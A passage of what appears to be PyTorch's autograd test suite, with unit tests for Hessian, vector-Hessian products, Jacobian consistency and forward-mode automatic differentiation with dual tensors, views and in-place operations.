res = autogradF.hessian(reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
inputs = torch.rand([])
res = autogradF.hessian(reducer, inputs, vectorize=vectorize)
self._assert_same_struct(res, inputs)
def bad_reducer(x):
return x.sum().view(1, 1, 1)
inputs = torch.rand(4, 4)
res = autogradF.hessian(bad_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
def test_hessian_scalar(self):
return self._test_hessian_scalar(vectorize=False)
def test_hessian_scalar_vectorize(self):
return self._test_hessian_scalar(vectorize=True)
def _test_hessian_create_graph(self, vectorize):
def pow_reducer(x):
return x.pow(3).sum()
inputs = torch.rand(2, 2, dtype=torch.double, requires_grad=True)
res = autogradF.hessian(pow_reducer, inputs, create_graph=True, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
self.assertIsNotNone(res.grad_fn)
gradcheck(lambda inp: autogradF.hessian(pow_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
gradgradcheck(lambda inp: autogradF.hessian(pow_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
def add_pow_reducer(x, y):
return (x + y).pow(3).sum()
inputs = (torch.rand(2, 2, dtype=torch.double, requires_grad=True),
torch.rand(2, 2, dtype=torch.double, requires_grad=True))
res = autogradF.hessian(add_pow_reducer, inputs, create_graph=True, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
self.assertIsNotNone(res[0][0].grad_fn)
self.assertIsNotNone(res[0][1].grad_fn)
self.assertIsNotNone(res[1][0].grad_fn)
self.assertIsNotNone(res[1][1].grad_fn)
def flatten(inp):
return tuple(el_lvl2 for el_lvl1 in inp for el_lvl2 in el_lvl1)
gradcheck(lambda *inp: flatten(autogradF.hessian(add_pow_reducer, inp, create_graph=True, vectorize=vectorize)), inputs)
gradgradcheck(lambda *inp: flatten(autogradF.hessian(add_pow_reducer, inp, create_graph=True, vectorize=vectorize)), inputs)
def foo(x, y):
x = x.cos()
val, hess = autogradF.hessian(add_pow_reducer, (x, y), create_graph=True, vectorize=vectorize)
res = val[0].cos().sum() + val[1].cos().sum() + hess[0].cos().sum()
res = res + hess[1].cos().sum() + x.cos().sum() + y.cos().sum()
return res
gradcheck(foo, inputs)
gradgradcheck(foo, inputs)
def test_hessian_create_graph(self):
self._test_hessian_create_graph(vectorize=False)
def test_hessian_create_graph_vectorize(self):
self._test_hessian_create_graph(vectorize=True)
def test_vhp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
def bar2(a):
return 3 * a.narrow(0, 0, 3)
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(TypeError, "The inputs given to vhp must be either a Tensor"):
res = autogradF.vhp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to vhp must"):
res = autogradF.vhp(bar, inp, v)
err_msg_out = "The Tensor returned by the function given to vhp should contain a single element"
with self.assertRaisesRegex(RuntimeError, err_msg_out):
res = autogradF.vhp(bar2, inp, v)
with self.assertRaisesRegex(RuntimeError, "v has invalid size:"):
res = autogradF.vhp(foo, inp, torch.rand(5))
with self.assertRaisesRegex(TypeError, "The v given to vhp must be either a Tensor or a tuple of Tensors"):
res = autogradF.vhp(foo, inp, (v, 2))
res = autogradF.vhp(foo, inp, v)
self._assert_same_struct(res[1], inp)
def foo(a, b):
return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum()
inp = (torch.rand(4), torch.rand(5))
v = (torch.rand(4), torch.rand(5))
res = autogradF.vhp(foo, inp, v)
self._assert_same_struct(res[1], inp)
def test_vhp_err_check_strict(self):
def foo(a):
return a.detach().sum()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone().sum()
def bar2(a):
# A Linear function for which the jacobian is independent of the input
return (3 * a).sum()
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.vhp(foo, inp, v, strict=True)
res = autogradF.vhp(foo, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
res = autogradF.vhp(bar, inp, v, strict=True)
res = autogradF.vhp(bar, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"):
res = autogradF.vhp(bar2, inp, v, strict=True)
res = autogradF.vhp(bar2, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
def test_vhp_no_grad(self):
def reducer(x):
return x.exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
with torch.no_grad():
res = autogradF.vhp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
with torch.no_grad():
res = autogradF.vhp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_vhp_output(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.vhp(foo, inputs, v)
self._assert_same_struct(res[1], inputs)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def bar(a, b):
return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
inputs = (torch.rand(3), torch.rand(4))
v = (torch.ones(3), torch.ones(4))
out, vhp_val = autogradF.vhp(bar, inputs, v)
self._assert_same_struct(vhp_val, inputs)
self.assertIsNone(out.grad_fn)
self.assertIsNone(vhp_val[0].grad_fn)
self.assertIsNone(vhp_val[1].grad_fn)
def test_vhp_scalar(self):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.vhp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
inputs = torch.rand([])
v = torch.rand([])
res = autogradF.vhp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
res = autogradF.vhp(reducer, inputs)
self._assert_same_struct(res[1], inputs)
def bad_reducer(x):
return x.sum().view(1, 1, 1)
inputs = torch.rand(4, 4)
v = torch.rand(4, 4)
res = autogradF.vhp(bad_reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
def test_vhp_create_graph(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
v = torch.ones(4, 4, dtype=torch.double, requires_grad=True)
res = autogradF.vhp(foo, inputs, v, create_graph=True)
self._assert_same_struct(res[1], inputs)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda inp, v: autogradF.vhp(foo, inp, v, create_graph=True), (inputs, v))
gradgradcheck(lambda inp, v: autogradF.vhp(foo, inp, v, create_graph=True), (inputs, v))
def bar(a, b):
return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
inputs = (torch.rand(3, dtype=torch.double, requires_grad=True),
torch.rand(4, dtype=torch.double, requires_grad=True))
v = (torch.ones(3, dtype=torch.double, requires_grad=True),
torch.ones(4, dtype=torch.double, requires_grad=True))
out, vhp_val = autogradF.vhp(bar, inputs, v, create_graph=True)
self._assert_same_struct(vhp_val, inputs)
self.assertIsNotNone(out.grad_fn)
self.assertIsNotNone(vhp_val[0].grad_fn)
self.assertIsNotNone(vhp_val[1].grad_fn)
gradcheck(lambda *args: autogradF.vhp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
gradgradcheck(lambda *args: autogradF.vhp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.vhp(bar, (x, y), v, create_graph=True)
return val.cos() + grad[0].cos().sum() + grad[1].cos() + x.cos().sum() + y.cos()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
def test_hvp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
def bar2(a):
return 3 * a.narrow(0, 0, 3)
inp = torch.rand(4)
v = torch.rand(4)
res = autogradF.hvp(foo, inp, v)
with self.assertRaisesRegex(TypeError, "The inputs given to hvp must be either a Tensor"):
res = autogradF.hvp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to hvp must"):
res = autogradF.hvp(bar, inp, v)
err_msg_out = "The Tensor returned by the function given to hvp should contain a single element"
with self.assertRaisesRegex(RuntimeError, err_msg_out):
res = autogradF.hvp(bar2, inp, v)
with self.assertRaisesRegex(RuntimeError, "v has invalid size:"):
res = autogradF.hvp(foo, inp, torch.rand(5))
with self.assertRaisesRegex(TypeError, "The v given to hvp must be either a Tensor or a tuple of Tensors"):
res = autogradF.hvp(foo, inp, (v, 2))
res = autogradF.hvp(foo, inp, v)
self._assert_same_struct(res[1], inp)
def foo(a, b):
return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum()
inp = (torch.rand(4), torch.rand(5))
v = (torch.rand(4), torch.rand(5))
res = autogradF.hvp(foo, inp, v)
self._assert_same_struct(res[1], inp)
def test_hvp_err_check_strict(self):
def foo(a):
return a.detach().sum()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone().sum()
def bar2(a):
# A Linear function for which the jacobian is independent of the input
return (3 * a).sum()
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.hvp(foo, inp, v, strict=True)
res = autogradF.hvp(foo, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
res = autogradF.hvp(bar, inp, v, strict=True)
res = autogradF.hvp(bar, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"):
res = autogradF.hvp(bar2, inp, v, strict=True)
res = autogradF.hvp(bar2, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
def test_hvp_no_grad(self):
def reducer(x):
return x.exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
with torch.no_grad():
res = autogradF.hvp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
with torch.no_grad():
res = autogradF.hvp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_hvp_output(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.hvp(foo, inputs, v)
self._assert_same_struct(res[1], inputs)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def bar(a, b):
return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
inputs = (torch.rand(3), torch.rand(4))
v = (torch.ones(3), torch.ones(4))
out, hvp_val = autogradF.hvp(bar, inputs, v)
self._assert_same_struct(hvp_val, inputs)
self.assertIsNone(out.grad_fn)
self.assertIsNone(hvp_val[0].grad_fn)
self.assertIsNone(hvp_val[1].grad_fn)
def test_hvp_scalar(self):
def reducer(x):
return x.exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.hvp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
inputs = torch.rand([])
v = torch.rand([])
res = autogradF.hvp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
res = autogradF.hvp(reducer, inputs)
self._assert_same_struct(res[1], inputs)
def bad_reducer(x):
return x.exp().sum().view(1, 1, 1)
inputs = torch.rand(4, 4)
v = torch.rand(4, 4)
res = autogradF.hvp(bad_reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
def test_hvp_create_graph(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
v = torch.ones(4, 4, dtype=torch.double, requires_grad=True)
res = autogradF.hvp(foo, inputs, v, create_graph=True)
self._assert_same_struct(res[1], inputs)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda inp, v: autogradF.hvp(foo, inp, v, create_graph=True), (inputs, v))
gradgradcheck(lambda inp, v: autogradF.hvp(foo, inp, v, create_graph=True), (inputs, v))
def bar(a, b):
return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
inputs = (torch.rand(3, dtype=torch.double, requires_grad=True),
torch.rand(4, dtype=torch.double, requires_grad=True))
v = (torch.ones(3, dtype=torch.double, requires_grad=True),
torch.ones(4, dtype=torch.double, requires_grad=True))
out, hvp_val = autogradF.hvp(bar, inputs, v, create_graph=True)
self._assert_same_struct(hvp_val, inputs)
self.assertIsNotNone(out.grad_fn)
self.assertIsNotNone(hvp_val[0].grad_fn)
self.assertIsNotNone(hvp_val[1].grad_fn)
gradcheck(lambda *args: autogradF.hvp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
gradgradcheck(lambda *args: autogradF.hvp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.hvp(bar, (x, y), v, create_graph=True)
return val.cos() + grad[0].cos().sum() + grad[1].cos() + x.cos().sum() + y.cos()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
def test_jacobian_match_vjp_jvp(self):
def foo(x):
return x ** 3 + x.sum()
inputs = torch.rand(4)
v = torch.rand(4)
jac = autogradF.jacobian(foo, inputs)
jvp = autogradF.jvp(foo, inputs, v)[1]
vjp = autogradF.vjp(foo, inputs, v)[1]
self.assertEqual(jvp, torch.mm(jac, v.unsqueeze(1)).squeeze(1))
self.assertEqual(vjp, torch.mm(v.unsqueeze(0), jac).squeeze(0))
def test_hessian_match_vhp_hvp(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4)
v = torch.rand(4)
hes = autogradF.hessian(foo, inputs)
hvp = autogradF.hvp(foo, inputs, v)[1]
vhp = autogradF.vhp(foo, inputs, v)[1]
self.assertEqual(hvp, torch.mm(hes, v.unsqueeze(1)).squeeze(1))
self.assertEqual(vhp, torch.mm(v.unsqueeze(0), hes).squeeze(0))
class TestAutogradForwardModeBatchedGrad(TestCase):
def test_out_of_place_basic(self):
a = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
b = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
self.assertTrue(gradcheck(torch.sin, a, check_forward_ad=True, check_batched_grad=True,
check_batched_forward_grad=True))
self.assertTrue(gradcheck(torch.add, (a, b), check_forward_ad=True, check_batched_grad=True,
check_batched_forward_grad=True))
def test_out_of_place_not_same_layout(self):
input = torch.zeros([2, 2]).transpose(0, 1)
tangent = torch.zeros([2, 2, 2])
def jvp(tangent):
with fwAD.dual_level():
x = fwAD.make_dual(input, tangent)
return fwAD.unpack_dual(x)[1]
x_tangent = torch._vmap_internals._vmap(jvp, 0, 0)(tangent)
self.assertIsNot(x_tangent, tangent)
def test_inplace_on_view_same_layout(self):
input = torch.zeros([2, 2])
tangent = torch.zeros([2, 2, 2])
base = torch.zeros([2, 2])
view = base.view_as(base)
def jvp(tangent):
with fwAD.dual_level():
x = fwAD.make_dual(input, tangent)
view.copy_(x)
return fwAD.unpack_dual(x)[1], fwAD.unpack_dual(view)[1], fwAD.unpack_dual(view._base)[1]
x_tangent, view_tangent, base_tangent = torch._vmap_internals._vmap(jvp, 0, 0)(tangent)
self.assertFalse(view_tangent._is_view()) # Optimization to share the same tensor!
self.assertIs(view_tangent, base_tangent)
self.assertIs(x_tangent, tangent)
self.assertIs(view_tangent, tangent)
def test_inplace_on_view_not_same_layout(self):
input = torch.zeros([2, 2])
tangent = torch.zeros([2, 2, 2])
view = torch.zeros([2, 2]).transpose(0, 1)
def jvp(tangent):
with fwAD.dual_level():
x = fwAD.make_dual(input, tangent)
view.copy_(x)
return fwAD.unpack_dual(x)[1], fwAD.unpack_dual(view)[1], fwAD.unpack_dual(view._base)[1]
x_tangent, view_tangent, base_tangent = torch._vmap_internals._vmap(jvp, 0, 0)(tangent)
self.assertIs(view_tangent._base, base_tangent)
self.assertIs(x_tangent, tangent)
self.assertIsNot(view_tangent, tangent)
def test_metadata_check_for_storage_numel_skipped(self):
# See: test_metadata_check_checks_storage_numel for the reverse of this test
primal = torch.randn(5)[:4].detach()
self.assertEqual(len(primal.storage()), 5)
tangent = torch.randn(10, 4)
def jvp(tangent):
with fwAD.dual_level():
dual = fwAD.make_dual(primal, tangent)
_, unpacked_tangent = fwAD.unpack_dual(dual)
# No copy is made
self.assertIs(tangent, unpacked_tangent)
# as_strided raises
with self.assertRaisesRegex(RuntimeError, "can access memory outside of `tensor`"):
dual.as_strided((5,), (1,), 0)
return unpacked_tangent
torch._vmap_internals._vmap(jvp, 0, 0)(tangent)
class TestAutogradForwardMode(TestCase):
def tearDown(self):
# Ensure that a failing test won't make others fail
while fwAD._current_level >= 0:
fwAD.exit_dual_level()
super().tearDown()
def test_forward_level_cleanup(self):
def get_tensor_and_weak_ref():
# Create a new Tensor and weak reference
t = torch.rand(2, requires_grad=True)
return t, torch._C._WeakTensorRef(t)
# Sanity check that the helper function works as expected
t, t_ref = get_tensor_and_weak_ref()
self.assertFalse(t_ref.expired())
del t
self.assertTrue(t_ref.expired())
# Main test code
foo = torch.rand(2)
with fwAD.dual_level():
tangent, tangent_ref = get_tensor_and_weak_ref()
self.assertFalse(tangent_ref.expired())
dual = fwAD.make_dual(foo, tangent)
self.assertFalse(tangent_ref.expired())
# Make sure that the tangent we provided has been re-used as is
self.assertTrue(fwAD.unpack_dual(dual)[1] is tangent)
# Make sure that dual is keeping the tangent alive
del tangent
self.assertFalse(tangent_ref.expired())
# Make sure that the dual level does not keep the c++
# version of the tangent alive
del dual
self.assertTrue(tangent_ref.expired())
def test_size_check(self):
foo = torch.rand(2)
tangent = torch.rand(3)
with fwAD.dual_level():
with self.assertRaisesRegex(RuntimeError, "Trying to set a forward gradient that has a different size"):
dual = fwAD.make_dual(foo, tangent)
dual = fwAD.make_dual(foo, tangent[1:])
def test_metadata_check_checks_storage_numel(self):
primal = torch.randn(5)[:4].detach()
self.assertEqual(len(primal.storage()), 5)
tangent = torch.randn(4)
with fwAD.dual_level():
dual = fwAD.make_dual(primal, tangent)
_, unpacked_tangent = fwAD.unpack_dual(dual)
# # Verify that mutating unpacked tangent does not affect the original tangent
tangent_clone = tangent.clone()
unpacked_tangent *= 2
self.assertTrue(torch.allclose(tangent_clone, tangent))
# as_strided runs without error
dual.as_strided((5,), (1,), 0)
def test_metadata_check_when_primal_has_conj_bit(self):
# Make sure the _has_same_storage_numel is a fallthrough, so that
# conj bit does not materialize. If it materializes it would
# cause the layout check to fail for views that do not index the
# the entire storage.
a = torch.randn(2, 2, dtype=torch.cdouble).conj()
b = torch.rand_like(a)
self.assertTrue(torch.is_conj(a))
self.assertEqual(len(a.storage()), len(b.storage()))
with fwAD.dual_level():
dual = fwAD.make_dual(a, b)
dual[1:]
def test_metadata_check_when_primal_has_neg_bit(self):
# Make sure the _has_same_storage_numel is a fallthrough, so that
# conj bit does not materialize. If it materializes it would
# cause the layout check to fail for views that do not index the
# the entire storage.
a = torch.randn(2, 2, dtype=torch.cdouble).conj().imag
b = torch.randn(2, 2, dtype=torch.cdouble).imag
self.assertTrue(torch.is_neg(a))
self.assertEqual(len(a.storage()), len(b.storage()))
with fwAD.dual_level():
dual = fwAD.make_dual(a, b)
dual[1:]
# The following test functions want to ensure all the following behaviors:
# - Ensure that default level system in the python binding works
# - Ensure that only level 0 exists and nesting is properly disabled
# - Ensure that printing works fine
# - Ensure that basic packing/unpacking works
# - Ensure that advanced packing/unpacking works
# - For memory / version counter share
# - For backward AD (regular ops)
# - Ensure that view + inplace for both modes work fine
# - Ensure we do proper cleanup on exit of a level
def test_default_level(self):
foo = torch.rand(2)
bar = torch.rand(2)
with fwAD.dual_level():
baz = fwAD.make_dual(foo, bar)
baz_primal, baz_tangent = fwAD.unpack_dual(baz)
self.assertEqual(baz_primal, foo)
# We don't actually need to enforce that these two are the exact same python
# object, feel free to relax in the future
self.assertIs(baz_tangent, bar)
baz_primal, baz_tangent = fwAD.unpack_dual(baz)
self.assertEqual(baz_primal, foo)
self.assertEqual(baz_tangent, None)
def test_nested_level(self):
with fwAD.dual_level() as level:
# For now only level 0 exists
self.assertEqual(level, 0)
with fwAD.dual_level():
with self.assertRaisesRegex(RuntimeError, "Nested forward mode AD is not supported at the moment"):
nest_level = fwAD.enter_dual_level()
def test_set_fw_grad_having_own_fw_grad_at_same_level(self):
foo = torch.rand(2)
bar = torch.rand(2)
baz = torch.rand(2)
with fwAD.dual_level():
dual = fwAD.make_dual(foo, bar)
with self.assertRaisesRegex(RuntimeError, "has a forward gradient at the same level"):
fwAD.make_dual(baz, dual)
def test_make_dual_inference_tensor_in_inference_mode(self):
with torch.inference_mode():
foo = torch.rand(2)
bar = torch.rand(2)
foo_copy = foo.clone()
with fwAD.dual_level():
dual = fwAD.make_dual(foo, bar)
self.assertFalse(dual._is_view())
dual += 1
self.assertFalse(torch.allclose(foo, foo_copy))
def test_make_dual_torch_dispatch(self):
counter = [0]
class MySubclass(torch.Tensor):
def __new__(cls, data=None):
return torch.Tensor._make_subclass(cls, data)
@classmethod
def __torch_dispatch__(cls, func, types, args=(), kwargs=None):
if func == torch.ops.aten.alias:
counter[0] += 1
with no_dispatch():
return MySubclass(torch.ops.aten.alias(*args))
with no_dispatch():
return func(*args, **kwargs)
a = torch.tensor(1.)
s = MySubclass(a)
with fwAD.dual_level():
fwAD.make_dual(s, torch.rand_like(s))
self.assertEqual(counter[0], 1)
fwAD.make_dual(torch.rand_like(s), s)
self.assertEqual(counter[0], 2)
def test_print(self):
with fwAD.dual_level() as level:
a = torch.rand(3)
self.assertFalse("tangent=" in str(a))
b = fwAD.make_dual(a, torch.rand(3))
self.assertFalse("tangent=" in str(a))
self.assertTrue("tangent=" in str(b))
b_primal, b_tangent = fwAD.unpack_dual(b)
self.assertFalse("tangent=" in str(b_primal))
self.assertFalse("tangent=" in str(b_tangent))
def test_basic_packing_unpacking(self):
foo = torch.rand(2)
bar = torch.rand(2)
with fwAD.dual_level():
baz = fwAD.make_dual(foo, bar)
baz_primal, baz_tangent = fwAD.unpack_dual(baz)
self.assertEqual(baz_primal, foo)
self.assertIs(baz_tangent, bar)
# Check unpacked dual is returned as a named tuple
# NB: Every invocation of unpack_dual returns a new tensor view
self.assertIsNot(baz_primal, fwAD.unpack_dual(baz).primal)
self.assertEqual(baz_primal, fwAD.unpack_dual(baz).primal)
self.assertIs(baz_tangent, fwAD.unpack_dual(baz).tangent)
# Check that packing/unpacking did not change the input
foo_primal, foo_tangent = fwAD.unpack_dual(foo)
self.assertEqual(foo_primal, foo)
self.assertIsNone(foo_tangent)
def test_advanced_packing_unpacking(self):
foo = torch.rand(2)
bar = torch.ones(2)
# Memory and version counter check
with fwAD.dual_level():
dual = fwAD.make_dual(foo, bar)
# Ensure that they are sharing memory and version counter
self.assertEqual(dual.storage().data_ptr(), foo.storage().data_ptr())
# Ensure we properly share the version counter
self.assertEqual(foo._version, dual._version)
foo.add_(1)
self.assertEqual(foo._version, dual._version)
# Unpacking should only create aliases as well
dual_primal, dual_tangent = fwAD.unpack_dual(dual)
self.assertEqual(dual_primal.storage().data_ptr(), foo.storage().data_ptr())
self.assertEqual(dual_tangent.storage().data_ptr(), bar.storage().data_ptr())
# And the tangent is actually re-used as-is so it is still the same Tensor
self.assertIs(dual_tangent, bar)
# Ensure we properly share the version counter
self.assertEqual(foo._version, dual_primal._version)
foo.add_(1)
self.assertEqual(foo._version, dual_primal._version)
self.assertEqual(bar._version, dual_tangent._version)
bar.add_(1)
self.assertEqual(bar._version, dual_tangent._version)
# backward mode check
with fwAD.dual_level():
foo.requires_grad_()
bar.requires_grad_()
# Check that backward gradients properly propagates through packing/unpacking
dual = fwAD.make_dual(foo, bar)
p, t = fwAD.unpack_dual(dual)
gfoo, gbar = torch.autograd.grad(p.sum(), (foo, bar), retain_graph=True, allow_unused=True)
self.assertEqual(gfoo, torch.ones_like(foo))
self.assertIsNone(gbar)
gfoo, gbar = torch.autograd.grad(t.sum(), (foo, bar), retain_graph=True, allow_unused=True)
self.assertIsNone(gfoo)
self.assertEqual(gbar, torch.ones_like(bar))
# Check that forward gradients are impacted by detach()
detached_dual = dual.detach()
out = detached_dual * 2
p, t = fwAD.unpack_dual(out)
self.assertFalse(p.requires_grad)
self.assertEqual(p, foo * 2)
self.assertIsNone(t)
# Check that forward gradients are not impacted by no_grad
with torch.no_grad():
out = dual * 3
p, t = fwAD.unpack_dual(out)
self.assertFalse(p.requires_grad)
self.assertFalse(t.requires_grad)
self.assertEqual(p, foo * 3)
self.assertEqual(t, bar * 3)
# Check that forward gradients are not impacted by inplace detach
dual = dual.clone()
dual.detach_()
out = dual * 2
p, t = fwAD.unpack_dual(out)
self.assertFalse(p.requires_grad)
self.assertEqual(p, foo * 2)
self.assertIsNone(t)
def test_view_inplace_non_differentiable_views(self):
original_foo = torch.rand(2, dtype=torch.double)
original_bar = torch.ones(2, dtype=torch.double)
# Do clones to be able to compare the values updated inplace
# with the original content of these Tensors
foo = original_foo.clone()
bar = original_bar.clone()
with fwAD.dual_level():
# Note that in this test, we use "update" to mean computing the right tangent for the dual
# All the inplace operations here are expected to update the primal value of the Tensors but
# not always their tangents.
# Also all mentions of "non differentiable view" here means non forward differentiable view
# unless specified otherwise.
# See note [Forward Grad View/inplace] for more details on how these views work.
# Check that inplace ops do not update non-differentiable views
# Non differentiable view
dual = fwAD.make_dual(foo, bar)
dual *= 2
# Check that non differentiable view's tangent was not updated
self.assertIsNone(fwAD.unpack_dual(foo)[1])
# Check that the computed result is correct
self.assertEqual(bar, original_bar * 2)
self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 2)
self.assertEqual(foo, original_foo * 2)
self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 2)
# Other non differentiable view
dual_primal, dual_tangent = fwAD.unpack_dual(dual)
self.assertIsNone(fwAD.unpack_dual(dual_primal)[1])
self.assertIsNone(fwAD.unpack_dual(dual_tangent)[1])
dual_primal *= 2
# Ensure dual's tangent did not change
self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 4)
self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 2)
dual_tangent *= 2
# Ensure dual's primal did not change
self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 4)
self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 4)
def test_view_inplace_differentiable_views(self):
original_foo = torch.rand(2)
original_bar = torch.ones(2)
# Do clones to be able to compare the values updated inplace
# with the original content of these Tensors
foo = original_foo.clone()
bar = original_bar.clone()
with fwAD.dual_level():
# Check that inplace ops do update differentiable view but stop at non differentiable ones
# A non differentiable view
dual = fwAD.make_dual(foo, bar)
# A differentiable view
view = dual.narrow(0, 0, 1)
view *= 2
# Check that non differentiable view was not updated
self.assertIsNone(fwAD.unpack_dual(foo)[1])
# Check that differentiable view was updated
self.assertEqual(fwAD.unpack_dual(dual)[1], torch.tensor([2., 1.]))
self.assertEqual(fwAD.unpack_dual(view)[1], torch.tensor([2.]))
# Check that we track differentiable view even for Tensors that are not dual
baz = torch.rand(2)
baz += dual
self.assertEqual(fwAD.unpack_dual(baz)[1], fwAD.unpack_dual(dual)[1])
# Updates on view should as well
baz = torch.rand(2)
baz[0] = dual[0]
self.assertEqual(fwAD.unpack_dual(baz)[1][0], fwAD.unpack_dual(dual)[1][0])
# Unused values get a gradient of 0
self.assertEqual(fwAD.unpack_dual(baz)[1][1], 0.)
# Check that forward non-differentiable views do prevent gradient update
baz = torch.rand(2)
view = baz.detach()
view += dual
self.assertIsNone(fwAD.unpack_dual(baz)[1])
def test_view_inplace_always_creates_a_view(self):
# See https://github.com/pytorch/pytorch/issues/67800
# The codepath may depend on the op. At the time writing, when self is not a dual tensor
# the resulting forward grad for self for...
# - add_ has the same layout as self
# - mul_ has the same layout as other
# This is kind of fragile because the above depends on how the forward grad expression
# is written. For add and mul at least, the output inherits the layout of LHS.
# We want to handle at least these two cases.
inplace_binary_ops = ( # Add more to this list?
lambda x, y: x.add_(y),
lambda x, y: x.mul_(y),
lambda x, y: x.copy_(y),
)
for inplace_binary_op in inplace_binary_ops:
base = torch.randn(2, 2)
view = base.transpose(0, 1)
primal = torch.randn(2, 2)
tangent = torch.randn(2, 2)
with fwAD.dual_level():
dual = fwAD.make_dual(primal, tangent)
inplace_binary_op(view, dual)
# Verify that a view relationship is created for both the primal and tangent
p, t = fwAD.unpack_dual(base)
p_clone = p.clone()
t_clone = t.clone()
view *= 2
p, t = fwAD.unpack_dual(base)
self.assertTrue(torch.allclose(p_clone * 2, p))
self.assertTrue(torch.allclose(t_clone * 2, t))
def test_grad_cleanup(self):
foo = torch.rand(2)
bar = torch.rand(2)
baz = torch.rand(2)
